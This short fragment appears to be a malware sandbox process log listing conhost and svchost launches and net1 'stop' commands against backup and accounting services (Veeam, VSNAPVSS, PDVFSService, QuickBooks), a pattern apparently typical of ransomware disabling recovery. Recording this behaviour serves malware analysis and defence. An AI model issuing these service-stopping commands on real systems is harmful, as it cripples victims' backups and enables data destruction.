C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5096
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:4608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:5452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:5256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:5192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:4296